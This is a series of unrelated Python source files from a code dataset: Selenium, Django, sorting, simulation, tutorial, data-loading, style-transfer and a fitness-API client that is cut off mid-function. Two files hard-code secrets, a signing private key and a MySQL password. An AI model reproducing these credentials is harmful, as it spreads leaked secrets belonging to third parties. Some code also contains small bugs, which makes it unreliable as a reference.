Keys\nfrom optparse import OptionParser\n\n# option in command line\nchromedriver = \"../chromedriver\"\nparser = OptionParser()\nparser.add_option(\"-d\", \"--driver\", action=\"store\", dest=\"drivername\")\n(options, args) = parser.parse_args()\nif options.drivername == \"chrome\": WebDriver = webdriver.Chrome(chromedriver)\nelse: WebDriver = webdriver.Firefox()\n\nWebDriver.get(\"http://www.python.org\")\n\nassert \"Python\" in WebDriver.title\nelem = WebDriver.find_element_by_name(\"q\")\nelem.clear()\nelem.send_keys(\"pycon\")\nelem.send_keys(Keys.RETURN)\nassert \"No results found.\" not in WebDriver.page_source\nWebDriver.close()\nWebDriver.quit()","sub_path":"selenium/automation/examples/test-webdriver.py","file_name":"test-webdriver.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"545315860","text":"# -*- coding: utf-8 -*-\nimport hashlib\nimport requests\nfrom log import logger\nimport json\nclass gensign(object):\n private_key='d082205acf33c732c20411f8391dcd2b'\n msg= {\"assets_id\": \"ZC0150\",\n \"data\": \"{\\\"repayment_schedule_list\\\":[{\\\"repayment_money\\\":\\\"8999.00\\\",\\\"repayment_interests\\\":\\\"97.49\\\",\\\"repayment_time\\\":\\\"2018-09-13\\\",\\\"periods\\\":\\\"1\\\",\\\"repayment_service_charge\\\":\\\"0.00\\\",\\\"current_period\\\":\\\"9096.49\\\"}],\\\"lender_list\\\":[],\\\"loan_info\\\":{\\\"order_no\\\":\\\"ZC20180810164816485799\\\",\\\"financing_order_no\\\":\\\"10test53090\\\",\\\"financing_name\\\":\\\"金蛋理财\\\",\\\"loan_money\\\":\\\"10000.00\\\",\\\"loan_status\\\":\\\"1\\\",\\\"create_time\\\":\\\"2018-08-24\\\",\\\"`\\\":\\\"2018-08-10\\\",\\\"interest_end\\\":\\\"2018-09-10\\\",\\\"periods\\\":1,\\\"repayment_method\\\":2,\\\"borrow_deadline\\\":30,\\\"deadline_unit\\\":1,\\\"interest_rate\\\":\\\"13.00\\\",\\\"interest_rate_type\\\":2,\\\"total_principal\\\":\\\"10000.00\\\",\\\"total_interests\\\":\\\"404.40\\\",\\\"total_service_charge\\\":\\\"0.00\\\",\\\"total_money\\\":\\\"10404.40\\\"},\\\"base_info\\\":{\\\"assets_order_no\\\":\\\"2018081418364600000054\\\",\\\"product_id\\\":\\\"ZC0150-01\\\",\\\"order_status\\\":70}}\",\n \"time\": 1533898087, \"sign\": \"d999736b7ba8f9ba8282ba4ccfcca51e\"}\n def gennoticesign(self):\n s=self.msg[\"assets_id\"]+self.msg[\"time\"].__str__()+self.private_key+self.msg[\"data\"]\n # 创建md5对象\n hl = hashlib.md5()\n hl.update(s.encode(encoding='utf-8'))\n print(s)\n # print(hl.hexdigest().upper())\n rs=hl.hexdigest()\n # rs=hl.digest()\n self.msg[\"sign\"]=rs\n print(rs)\n # print(json.dumps(self.msg))\n print(self.msg)\n return rs\n\n def postmsg(self):\n url='http://10.31.153.170:8087/notice/loan/jd'\n headers=dict()\n headers['Content-Type']='application/json'\n rs=requests.post(url=url,data=self.msg,headers=headers)\n logger.info(rs)\n if rs.status_code=='200':\n logger.info(\"回调结果: \"+rs.text)\n\n\nif __name__=='__main__':\n a=gensign()\n a.gennoticesign()\n# assets_order_no=\"\"\"\n# 2018081414131600000003\n# 2018081414131700000004\n# 2018081414131700000005\n# 2018081414131700000006\n# 2018081414131700000007\n# 2018081414131700000008\n# 2018081414131800000009\n# 2018081414131800000010\n# \"\"\"\n#\n# for i in assets_order_no.splitlines():\n# if i.strip().__len__()>0:\n# print(i.strip())\n # pass","sub_path":"paycenter/financingmng/gensign.py","file_name":"gensign.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} 
+{"seq_id":"562001938","text":"from django.conf.urls import url\nfrom django.urls import path\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom siphoner_app import views\n\nurlpatterns = [\n url(r'^api/$', views.api_root),\n url(r'^api/nws-offices/$', views.NWSOfficeList.as_view(), name='nws-office-list'),\n url(r'^api/nws-stations/$', views.NWSObservationStationList.as_view(), name='nws-station-list'),\n url(r'^api/nws-gridpoints/$', views.NWSGridPointList.as_view(), name='nws-gridpoint-list'),\n url(r'^api/nws-units/$', views.NWSUnitList.as_view(), name='nws-unit-list'),\n url(r'^api/nws-variables/$', views.NWSVariableList.as_view(), name='nws-variable-list'),\n url(r'^api/nws-forecast-sources/$', views.NWSForecastSourceList.as_view(), name='nws-forecast-source-list'),\n url(r'^api/nws-forecasts/$', views.NWSForecastList.as_view(), name='nws-forecast-list'),\n url(\n r'^api/nws-forecasts/latest-time$',\n views.NWSLatestForecastTime.as_view(),\n name='nws-latest-forecast-time'\n ),\n url(\n r'^api/nws-observations/$',\n views.NWSObservationList.as_view(),\n name='nws-observation-list'\n ),\n url(\n r'^api/nws-observations/latest-time$',\n views.NWSLatestObservationTime.as_view(),\n name='nws-latest-observation-time'\n ),\n url(\n r'^api/unidata-forecasts/$',\n views.UnidataForecastList.as_view(),\n name='unidata-forecast-list'\n ),\n url(\n r'^api/unidata-forecasts/gfs/latest-time$',\n views.UnidataGFSLatestForecastTime.as_view(),\n name='unidata-gfs-latest-forecast-time'\n ),\n url(\n r'^api/unidata-forecasts/gefs/latest-time$',\n views.UnidataGEFSLatestForecastTime.as_view(),\n name='unidata-gefs-latest-forecast-time'\n ),\n url(\n r'^api/unidata-forecasts/sref/latest-time$',\n views.UnidataSREFLatestForecastTime.as_view(),\n name='unidata-sref-latest-forecast-time'\n ),\n url(\n r'^api/unidata-forecasts/hrrr/latest-time$',\n views.UnidataHRRRLatestForecastTime.as_view(),\n name='unidata-hrrr-latest-forecast-time'\n ),\n url(\n r'^api/unidata-forecasts/nam/latest-time$',\n views.UnidataNAMLatestForecastTime.as_view(),\n name='unidata-nam-latest-forecast-time'\n ),\n\n path('csrf/', views.csrf),\n path('ping/', views.ping)\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n","sub_path":"siphoner_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"642528241","text":"import random\n\n\ndef qsort(array, left, right):\n p = random.choice(array[left:right + 1])\n i, j = left, right\n while i <= j:\n while array[i] < p:\n i += 1\n while array[j] > p:\n j -= 1\n if i <= j:\n array[i], array[j] = array[j], array[i]\n i += 1\n j -= 1\n\n if j > left:\n qsort(array, left, j)\n if right > i:\n qsort(array, i, right)\n\n return array\n\n\narray = [2, 3, 1, 4, 6, 5, 9, 8, 7]\nprint(qsort(array, left=0, right=(len(array) - 1)))\n","sub_path":"С4 Algorithms and Data Structures/Быстрая сортировка.py","file_name":"Быстрая сортировка.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"405606800","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2017-18 Richard Hull and contributors\n# See LICENSE.rst for details.\n\n\"\"\"\nTest helpers.\n\"\"\"\n\nimport os.path\nimport platform\n\ntry:\n from unittest.mock import patch, call, Mock\nexcept ImportError:\n from mock import patch, call, Mock # noqa: F401\n\nimport pytest\n\nfrom PIL import ImageChops, 
ImageFont\n\n\nrpi_gpio_missing = 'RPi.GPIO is not supported on this platform: {}'.format(\n platform.system())\nspidev_missing = 'spidev is not supported on this platform: {}'.format(\n platform.system())\npyftdi_missing = 'pyftdi is not supported on Python {}'.format(platform.python_version())\n\n\ndef get_reference_file(fname):\n return os.path.abspath(os.path.join(\n os.path.dirname(__file__),\n 'reference',\n fname))\n\n\ndef get_reference_image(fname):\n return get_reference_file(os.path.join('images', fname))\n\n\ndef get_reference_font(fname, fsize=12):\n path = get_reference_file(os.path.join('font', fname))\n return ImageFont.truetype(path, fsize)\n\n\ndef get_spidev():\n try:\n import spidev\n return spidev\n except ImportError:\n pytest.skip(spidev_missing)\n\n\ndef assert_identical_image(reference, target, img_path):\n bbox = ImageChops.difference(reference, target).getbbox()\n assert bbox is None, '{0} is not identical to generated image'.format(\n os.path.basename(img_path))\n\n\ndef i2c_error(path_name, err_no):\n expected_error = OSError()\n expected_error.errno = err_no\n expected_error.filename = path_name\n\n def fake_open(a, b):\n raise expected_error\n return fake_open\n\n\ndef fib(n):\n a, b = 0, 1\n for _ in range(n):\n yield a\n a, b = b, a + b\n","sub_path":"tests/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"473082303","text":"import random\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\n\nR_ON = 255\nW_ON = 100\nOFF = 0\nvals = [R_ON, OFF, W_ON]\nW_birth_rate = 0.02\nR_birth_rate = 0.2\nempty_rate = 1.0 - W_birth_rate - R_birth_rate\nW_birth_chance = 90\nW_die_chance = 6\nR_birth_chance = 10\n\n\ndef random_grid(n):\n return np.random.choice(vals, n*n, p=[R_birth_rate, empty_rate, W_birth_rate]).reshape(n, n)\n\n\ndef update(frameNum, img, grid, n):\n newGrid = grid.copy()\n for i in range(n):\n for j in range(n):\n #If I'm a rabbit\n if grid[i, j] == R_ON:\n empty_spaces = [(x, y) for x in [(i-1) % n, i, (i+1) % n] for y in [(j-1) % n, j, (j+1) % n] if grid[x, y] == OFF]\n wolves_spaces = [(x, y) for x in [(i-1) % n, i, (i+1) % n] for y in [(j-1) % n, j, (j+1) % n] if grid[x, y] == W_ON]\n if wolves_spaces:\n newGrid[i, j] == W_ON\n elif len(empty_spaces) > 0:\n random_move = random.randint(0, len(empty_spaces) - 1) if len(empty_spaces) > 1 else 0\n newGrid[empty_spaces[random_move]] = R_ON\n newGrid[i, j] = OFF\n if random.randint(0, 100) > 100 - R_birth_chance:\n newGrid[i, j] = R_ON\n #If I'm a wolf\n if grid[i, j] == W_ON:\n rabbits_spaces = [(x, y) for x in [(i-1) % n, i, (i+1) % n] for y in [(j-1) % n, j, (j+1) % n] if grid[x, y] == R_ON]\n if not rabbits_spaces:\n if random.randint(0, 100) > 100 - W_die_chance:\n newGrid[i, j] = OFF\n else:\n newGrid[i, j] = OFF\n newGrid[(i + random.randint(-1, 1)) % n, (j + random.randint(-1, 1)) % n] = W_ON\n else:\n random_move = random.randint(0, len(rabbits_spaces) - 1) if len(rabbits_spaces) > 1 else 0\n newGrid[rabbits_spaces[random_move]] = W_ON\n elif grid[i, j] == OFF:\n pass\n img.set_data(newGrid)\n grid[:] = newGrid[:]\n return img\n\n\ndef main():\n n = 100\n update_interval = 70\n grid = random_grid(n)\n\n fig, ax = plt.subplots() #A few decent looking color themes already applied in matplotlib: summer, hot, afmhot, gist_heat\n img = ax.imshow(grid, interpolation='nearest', cmap='hot')\n ani = animation.FuncAnimation(fig, 
update, fargs=(img, grid, n, ),\n frames=10, interval=update_interval, save_count=50)\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"predator-prey.py","file_name":"predator-prey.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"484609067","text":"# Tutorial Examples for lecture week 3\n# conditionals and loops\n# author: B. Schoen-Phelan\n# date: Oct 2020\n\n\n# some examples taken from or adapted from the ms python course\n# with Susan Ibach and Christopher Harris\n\n# arrays exist but not natively\n# we have to import a module\n# arrays can only be of one type\n# lists can contain items of different types\n\nnames = ['Bianca', 'Bryan', 'Susan']\nprint(names[:1])\nprint(names[-1])\nprint(names[:])\n# names.insert(-1,'Buddy') #does something interesting\n# # do this instead for insert at end:\nnames.insert(len(names), 'Buddy2')\nprint(names)\n\n# looping\nfor name in names:\n print(name)\n\n# looping a number of times with range\nfor i in range(10):\n print(i, end =\" \")\n#\n# #\nmy_list = [10, 20, 30, 40]\nfor i in range(len(my_list)):\n print(my_list[i], end =\" \")\n#\nmy_sum = 0\nfor i in range(1, 11):\n my_sum += i\n\nprint(\"Sum of first 10 natural number :\", my_sum)\n\nfor i in range(2, 26, 2):\n print(i, end =\" \")\n\nprint(list(range(10)))\n\n\n# spot the difference in these examples\n# version 1\nprice = input(\"how much did it cost? \")\nif float(price) >= 1.00:\n tax = 0.07\n print(tax)\nelse:\n tax = 0\n print(tax)\n\n# version 2: difference for larger number\nprice = input(\"how much did it cost? \")\nif float(price) >= 1.00:\n tax = 0.07\n print(tax)\nelse:\n tax = 0\nprint(tax)\n\n# more elegant version 3\nprice = input(\"how much did it cost? \")\nif float(price) >= 1.00:\n tax = 0.07\nelse:\n tax = 0\nprint(tax)\n\n# boolean ifs\ngpa = .85\nlowest_grade = .7\nprize_winner = False\n#\nif (gpa >= .85 and lowest_grade >= .7):\n prize_winner = True\nelse:\n prize_winner = False\n\n\n\n# some time later in the code check\n# we don't use prize_winner == True <- c-ish syntax is frowned upon in Python\n# don't use prize_winner == True\n\nif prize_winner:\n print(\"Special award needs to be printed\")\nelse:\n print(\"no prize needed\")\n\n\n# string comparisons hold lots of potential\n# error sources\n# try input ireland or IRELAND\n# case sensitivity!\nmy_country = input(\"Where are you from?\")\nif my_country == 'Ireland':\n print(\"pot of gold for you\")\nelse:\n print(\"no gold for you\")\n\n# better with conversion\nmy_country = input(\"Where are you from? \")\nif my_country.upper() == 'IRELAND':\n print(\"pot of gold for you\")\nelse:\n print(\"no gold for you\")\n\n# even better with removing space padding\nmy_country = input(\"Where are you from? 
\")\nif my_country.upper().strip() == 'IRELAND':\n print(\"pot of gold for you\")\nelse:\n print(\"no gold for you\")\n\n# else elif and default option else for\n# Irish VAT rates\n# see what happens if doing or without\nvat_bands = (\"Intra-Community transactions\", \"Vessels and Aircraft\",\n \"Agriculture\", \"Pharmaceuticals\", \"Shows\",\n \"Standard rate\")\nmy_vat = input(\"Which category are you in: \").strip()\n# # nesting of ifs\nif my_vat in vat_bands:\n if my_vat in (\"Intra-Community transactions\",\"Vessels and Aircraft\"):\n tax = 0\n elif my_vat == \"Agriculture\":\n tax = 0.048\n elif my_vat in (\"Pharmaceuticals\", \"Shows\"):\n tax = 0.135\n else:\n tax = 0.23\n print(tax)\nelse:\n print(\"Category does not exist\")\n\n# take input string and calculate the number\n# of digits and the number of characters\n# in the input string\nmy_input = input(\"Enter a sentence: \")\ndigit_counter = 0\nchar_counter = 0\n# #\n#for character in my_input:\n #if character.isdigit():\n #digit_counter = digit_counter + 1\n #elif character.isalpha():\n #char_counter = char_counter + 1\n #else:\n# pass # do nothing, we'll just ignore spaces etc\n#\n#print(\"Number of digits: \", digit_counter)\n#print(\"Number of characters: \", char_counter)\n\n# enumerate\n# count over iterables\nindex = 0\nmy_numbers = [1, 2, 3, 4, 5]\nwhile index < len(my_numbers):\n print(my_numbers[index])\n index += 1\n\n\n# works fine, but now change my_numbers to a non-sequence object\n# like set\n#index = 0\n#my_numbers = {1, 2, 3, 4, 5}\n#while index < len(my_numbers):\n #print(my_numbers[index])\n #index += 1\n\nfruits = (\"apple\", \"banana\", \"pear\")\nmy_iterator = enumerate(fruits)\nprint(type(my_iterator))\nprint(next(my_iterator)) # next() returns the next item in an iterator\n\nfruits = (\"apple\", \"banana\", \"pear\")\nfor index, fruit in enumerate(fruits):\n print(\"index is %d and value is %s \" % (index, fruit))\n\n\n# manually need to keep track of the iterating variable\n# here it is \"i\" if you don't use enumerate()\nfruits = (\"apple\", \"banana\", \"pear\")\ni = 0\n\nfor fruit in fruits:\n print(\"index is %d and value is %s \" % (i, fruit))\n i += 1\n\n\n\n\n\n\n","sub_path":"Labs/tutorial/w3_tutorial.py","file_name":"w3_tutorial.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"336056150","text":"#!/usr/bin/python\n\nimport os\nimport sys\nimport datetime\nimport subprocess\nimport mysql.connector\n\nprint('WinCOR masterdata processing started at ' + str(datetime.datetime.now()))\n\ntry:\n\tcnx = mysql.connector.connect(user='pimloader', password='lGClNEeyIU5Lss', database='pim_loader')\nexcept Exception as e:\n\tprint('An error ocurred while trying to connect to pim_loader database: ' + str(e))\n\nmd_add = (\"INSERT INTO tmp_wincor_product (op_type, cod_wincor, cod_family, cod_subfamily, cod_group, cod_subgroup, description, short_desc, pack_size, brand_name, country, active) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\")\ncursor = cnx.cursor()\n\ntry:\n\tincoming_file = open(sys.argv[1], 'r')\n\n\tfor line in incoming_file: \n\t\tline = line.rstrip('\\n')\n\t\tfields = line.split('|')\n\t\tif fields[0] != \"\":\n\t\t\tmd_data = (fields[0], fields[1], fields[2], fields[3], fields[4], fields[5], fields[6], fields[7], fields[8], fields[9], fields[10], fields[11])\n\t\t\tcursor.execute(md_add, md_data)\n\tcnx.commit()\n\tincoming_file.close()\n\n\t# Maintain 
lt_wincor_product\n\tprint('Maintaining WinCOR products...')\n\tcursor.callproc('sp_wincor_product_maintainer')\n\n\tprint('Creating Master Data interface for file ' + sys.argv[1] + '...')\n\tcursor.callproc('sp_wincor_masterdata_IF')\n\tprint('Master Data interface created for file ' + sys.argv[1])\n\n # Export et_gamma_masterdata_IF table.\n\tcmd_call = ['/bin/exportfromysqltable.sh', '/var/sftp/share/sftp/pim_loader/export/akeneo/export_wincor_masterdata_to_akeneo', 'pim_loader', 'et_wincor_masterdata_IF']\n\tsubprocess.check_call(cmd_call)\n\tprint('WinCOR Master Data table fetched from file ' + sys.argv[1] + ' exported to Akeneo.')\n\n\tcursor.callproc('sp_wincor_product_to_hist')\n\tprint('Information moved to historial tables.')\n\n\tos.rename(sys.argv[1], './processed/' + sys.argv[1])\n\tprint('WinCOR masterdata file ' + sys.argv[1] + ' dumped into pim_loader database and moved to processed folder.')\n\nexcept Exception as e:\n\tprint('An error has ocurred while processing WinCOR masterdata: ' + str(e))\n\tf = open('not_processed/WinCOR_exceptions.log', 'a')\n\tf.write('Error while processing file ' + sys.argv[1] + ' at ' + str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")) + '\\nError message: ' + str(e) + '\\n')\n\tos.rename(sys.argv[1], './not_processed/' + sys.argv[1])\n\tf.write('File ' + sys.argv[1] + ' moved to not_processed folder.\\n')\n\tprint('File ' + sys.argv[1] + ' moved to not_processed folder.')\n\nfinally:\n\tcursor.callproc('sp_wincor_masterdata_tables_truncation')\n\tcursor.close()\n\tcnx.close()\n\tprint('WinCOR masterdata processing ended at ' + str(datetime.datetime.now()))\n","sub_path":"wincor/WinCOR_masterdata_processing.py","file_name":"WinCOR_masterdata_processing.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"412378877","text":"from keras.applications import vgg19, resnet50\nfrom keras import backend as K\nimport cv2\nimport numpy as np\nimport zipfile\nimport os\n\n# init\nimg_nrows = 600\nimg_ncols = 600\nstyle_reference_image_path = './image_base_styles/v2-8e0585aa43edc8a39c8173953a14b276_hd.jpg'\nbase_image_path = './image_base_styles/v2-e2af25d1ce412ebbe3a8ab9d58c3039c_hd.jpg'\n\ncheck_model = 'resnet50'\ncheck_image = 'base'\n\n\ndef preprocess_image(image_path):\n # img = load_img(image_path, target_size=(img_nrows, img_ncols))\n # img = img_to_array(img)\n # img = np.expand_dims(img, axis=0)\n\n img = cv2.imread(image_path, 1)\n img = cv2.resize(img, (img_nrows, img_ncols))\n img = np.array(img)\n img = np.expand_dims(img, axis=0)\n img = vgg19.preprocess_input(img)\n return img\n\n\nbase_image = K.variable(preprocess_image(base_image_path))\nstyle_reference_image = K.variable(preprocess_image(style_reference_image_path))\nprint('image tensor loaded successfully!')\n\ninput_tensor = K.concatenate([base_image,\n style_reference_image], axis=0)\nprint('input tensor created successfully!')\n\n\nif check_model == 'vgg19':\n model = vgg19.VGG19(input_tensor=input_tensor,\n weights='./out_model/vgg19_weights_tf_dim_ordering_tf_kernels_notop.h5', include_top=False)\n f_zip = zipfile.ZipFile('d:/python/neural_style_transfer_data_save/vencent_all/vgg19_'+check_image+'.zip', 'w',\n zipfile.ZIP_STORED)\nelif check_model == 'resnet50':\n model = resnet50.ResNet50(input_tensor=input_tensor,\n weights='./out_model/resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5',\n include_top=False)\n f_zip = 
zipfile.ZipFile('d:/python/neural_style_transfer_data_save/vencent_all/resnet_'+check_image+'.zip', 'w',\n zipfile.ZIP_STORED)\nprint('Model loaded successfully!')\n\noutputs_dict = dict([(layer.name, layer.output) for layer in model.layers])\n\n\nif True:\n f = open('./' + check_model + '_structure.txt', 'w')\n for key in outputs_dict:\n f.write(str(key) + ' ' + str(outputs_dict[key]) + '\\n')\n\n# for key in outputs_dict:\n\n\nfor key in outputs_dict:\n layer_features = outputs_dict[str(key)]\n base_image_features = K.eval(layer_features[0, :, :, :])\n style_image_features = K.eval(layer_features[1, :, :, :])\n i = 0\n while True:\n try:\n channel_image = ((abs(base_image_features[:, :, i]) +\n abs(np.min(base_image_features[:, :, i])))/np.max(base_image_features[:, :, i])) * 255\n cv2.imwrite(r'd:/python/neural_style_transfer_data_save/vencent_all/'+check_model+'/'\n + str(key)+'_'+str(i)+'_channel.jpg',\n channel_image)\n f_zip.write('d:/python/neural_style_transfer_data_save/vencent_all/'+check_model+'/'\n + str(key)+'_'+str(i)+'_channel.jpg')\n os.remove(r'd:/python/neural_style_transfer_data_save/vencent_all/'+check_model+'/'\n + str(key)+'_'+str(i)+'_channel.jpg')\n if i < 1:\n cv2.imwrite(r'd:/python/neural_style_transfer_data_save/vencent_all/' + check_model + '/'\n + str(key) + '_' + str(i) + '_channel.jpg', channel_image)\n i += 1\n except:\n print('there is no more channel')\n break\n\n# f_vgg.close()\nf_zip.close()\n\n# img = base_image_features[:, :, 0:3]\n# channel_1 = img[:, :, 0]\n# channel_2 = img[:, :, 1]\n# channel_3 = img[:, :, 2]\n# cv2.imshow('check_1', cv2.merge([channel_1, channel_2, channel_3]))\n# cv2.imshow('check_2', cv2.merge([channel_1, channel_3, channel_2]))\n# cv2.imshow('check_3', cv2.merge([channel_2, channel_1, channel_3]))\n# cv2.imshow('check_4', cv2.merge([channel_2, channel_3, channel_1]))\n# cv2.imshow('check_5', cv2.merge([channel_3, channel_2, channel_1]))\n# cv2.imshow('check_6', cv2.merge([channel_3, channel_1, channel_2]))\n# cv2.imshow('check_7', cv2.merge([channel_1, channel_1, channel_1]))\n# cv2.imshow('check_8', cv2.merge([channel_2, channel_2, channel_2]))\n# cv2.imshow('check_9', cv2.merge([channel_3, channel_3, channel_3]))\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n","sub_path":"style_tansfer/conv_of_resnet.py","file_name":"conv_of_resnet.py","file_ext":"py","file_size_in_byte":4254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"309698361","text":"import random\n\nimport requests\nfrom pprint import pprint\nimport json\nimport pyramid.httpexceptions as exc\nfrom datetime import date\nimport calendar\nimport toml\n\n\n\nclass WengerApi:\n\n headers1 = {'Accept': 'application/json'\n }\n\n def __init__(self, username, password,token):\n self.username = username\n self.password = password\n self.token = token\n self.header = WengerApi.headers1.copy()\n self.header[\"Authorization\"] = token\n self.login()\n\n def login(self):\n data = {\"username\": {self.username},\n \"password\": {self.password},\n \"submit\": \"Login\"}\n url = 'https://wger.de/en/user/login'\n login_get = requests.get(url=url, headers=self.header)\n self.header['X-CSRFToken'] = login_get.cookies[\"csrftoken\"]\n self.header['Referer'] = url\n session_id = login_get.cookies.get(\"sessionid\")\n csrf_token = login_get.cookies.get(\"csrftoken\")\n cookie_full = f\"csrftoken={csrf_token}; sessionid={session_id}\"\n self.header[\"Cookie\"] = cookie_full\n req = requests.post(url=url, data=data, 
headers=self.header)\n if req.status_code in [200,201]:\n return req, \"The login was performed successfuly\"\n else:\n return False, f\"Error {req.status_code}\"\n\n def get_req(self,object):\n g1 = requests.get('https://wger.de/api/v2/')\n url = g1.json().get(object)\n if url != None:\n req1 = requests.get(url=url, headers=self.header)\n count = req1.json().get('count')\n url1 = url + f\"?limit={count}&offset=0\"\n g = requests.get(url=url1, headers=self.header)\n if g.status_code == 200:\n return g.json(), f\"The get request for {object} was performed successfully\"\n else:\n return False, \"Couldn't make the request!\"\n else:\n return False, 'Invalid url'\n\n def post_req(self,object, data):\n\n g1 = requests.get('https://wger.de/api/v2/')\n url1 = g1.json().get(object)\n\n if url1 != None:\n req = requests.post(url=url1,data=data,headers=self.header)\n if req.status_code == 201:\n return req, f'The post request for {object} was done successfully'\n else:\n return False, f'Error {req.status_code}'\n else:\n return False, 'Invalid url'\n\n def name_to_id(self, param1,param1_value ,param2, object):\n req = self.get_req(object)\n print(req[0].get('results', []))\n for item in req[0].get('results', []):\n if item.get(param1) == param1_value:\n return item.get(param2), f\"The id for {param1} was provided successfully\"\n\n return False, f\"The item with {param1} doesn't have id\"\n\n\n def delete_req(self,object, id=None):\n\n g1 = requests.get('https://wger.de/api/v2/')\n url1 = g1.json().get(object)\n if url1 != None:\n url = f\"{url1}/{id}\"\n req = requests.delete(url=url, headers=self.header)\n if req.status_code not in (200,202,204):\n return False, f\"The delete for id {id} couldn't be performed\"\n return req, f\"The delete for {object} with id {id} was performed\" \\\n f\"successfully! Status code is {req.status_code}\"\n else:\n return False, \"Error! 
The URL doesn't exists!\"\n\n def create_weight_entry(self,date,value):\n\n data = {\n \"date\":date,\n \"weight\":value,\n }\n\n return self.post_req('weightentry',data)\n\n def create_nutrition_plan(self,description=None):\n\n if description == None:\n my_date = date.today()\n description = calendar.day_name[my_date.weekday()]\n data = {\n 'description': description\n }\n return self.post_req('nutritionplan', data)\n\n def create_meals_for_nutrition_plans(self,plan,time=None):\n\n data = {\n 'plan': plan,\n 'time':time\n }\n return self.post_req('meal',data)\n\n def add_meal_item(self,meal,ingredient,amount):\n\n data = {\n 'meal':meal,\n 'ingredient':ingredient,\n 'amount':amount\n }\n\n return self.post_req('mealitem',data)\n\n def add_workout_day(self,name,description):\n\n data = {\n\n \"name\":name,\n \"description\":description\n }\n\n return self.post_req('workout',data)\n\n def add_day(self,training,description,day):\n\n workouts = self.get_req('workout')\n list_of_workout = list()\n workouts_list = workouts[0].get('results')\n if workouts_list != None:\n\n for workout in workouts_list:\n list_of_workout.append(workout[\"id\"])\n\n if training not in list_of_workout:\n return False, f\"The training with id {training} doesn't exists!\"\n data ={\n\n \"training\":training,\n \"description\":description,\n \"day\":day\n }\n return self.post_req('day',data)\n\n def add_exercise(self,exerciseday,sets,order):\n\n data = {\n 'exerciseday': exerciseday,\n 'sets': sets,\n 'order': order\n }\n\n return self.post_req('set',data)\n\n def setting_exercise_set(self, set, exercise,repetition_unit,reps,weight,weight_unit,rir):\n\n data = {\n 'set':set,\n 'exercise':exercise,\n 'repetition_unit':repetition_unit,\n 'reps':reps,\n 'weight':weight,\n 'weight_unit':weight_unit,\n 'rir':rir,\n }\n\n return self.post_req('setting',data)\n\n\n def add_exercise_one_method(self,exercises,sets):\n keys = list()\n for exercise in exercises:\n for i in range(sets):\n keys.append(f'exercise{exercise}-{i}-reps')\n keys.append(f'exercise{exercise}-{i}-repetition_unit')\n keys.append(f'exercise{exercise}-{i}-weight')\n keys.append(f'exercise{exercise}-{i}-weight_unit')\n keys.append(f'exercise{exercise}-{i}-rir')\n\n return keys\n\n\n def add_schedule(self,name,start_date,is_active,is_loop):\n\n data = {\n 'name':name,\n 'start_date':start_date,\n 'is_active':is_active,\n 'is_loop':is_loop\n\n }\n return self.post_req('schedule',data)\n\n def add_workout_to_schedule(self,schedule,workout,duration):\n\n data = {\n 'schedule':schedule,\n 'workout':workout,\n 'duration':duration\n }\n\n return self.post_req('schedulestep',data)\n\n\n def get_random_id(self,object):\n object_req = self.get_req(object)\n list_of_ids = list()\n if object_req[0]:\n for elem in object_req[0].get('results'):\n list_of_ids.append(elem.get('id'))\n return random.choice(list_of_ids)\n\n\n def delete_workout(self, id=None):\n\n workouts = self.get_req('workout')\n list_of_id = list()\n for workout in workouts[0].get('results',[]):\n list_of_id.append(workout.get('id'))\n if id is not None:\n if id in list_of_id:\n req = self.delete_req('workout',id)\n return req, f\"Workout with id {id} was deleted successfully \"\n else:\n return False, f\"Workout with id {id} was not found!\"\n else:\n if len(list_of_id) != 0:\n undeleted_workouts = list()\n for id1 in list_of_id:\n req2 = self.delete_req('workout',id1)\n if req2 is False:\n undeleted_workouts.append(id1)\n if len(undeleted_workouts) == 0:\n return True, \"All existing workouts has been 
deleted!\"\n else:\n return undeleted_workouts, f\"The following workouts couldn't be deleted {undeleted_workouts}\"\n else:\n return False, \"There are no workouts to be deleted\"\n\n def delete_all_nutrition_plans(self):\n nutrition_plans = self.get_req('nutritionplan')\n for nutrition_plan in nutrition_plans[0].get('results',[]):\n req = self.delete_req('nutritionplan',nutrition_plan.get('id'))\n if req[0] is False:\n return req[0]\n return True\n\n def delete_all_meals_from_nutrition_plan(self):\n meals = self.get_req('meal')\n for meal in meals[0].get('results',[]):\n req = self.delete_req('meal',meal.get('id'))\n if req[0] is False:\n return False\n return True\n\n def delete_all_items_from_meal(self):\n items = self.get_req('mealitem')\n for item in items[0].get('results',[]):\n req = self.delete_req('mealitem',item.get('id'))\n\n if req[0] is False:\n return False\n return True\n\n\n def delete_exercise(self, workout_id = None, day_id = None, exercise_id = None):\n if workout_id is not None:\n list_of_workouts = self.get_req('workout')\n list_of_workouts_ids = list()\n for workout in list_of_workouts.get('results',[]):\n 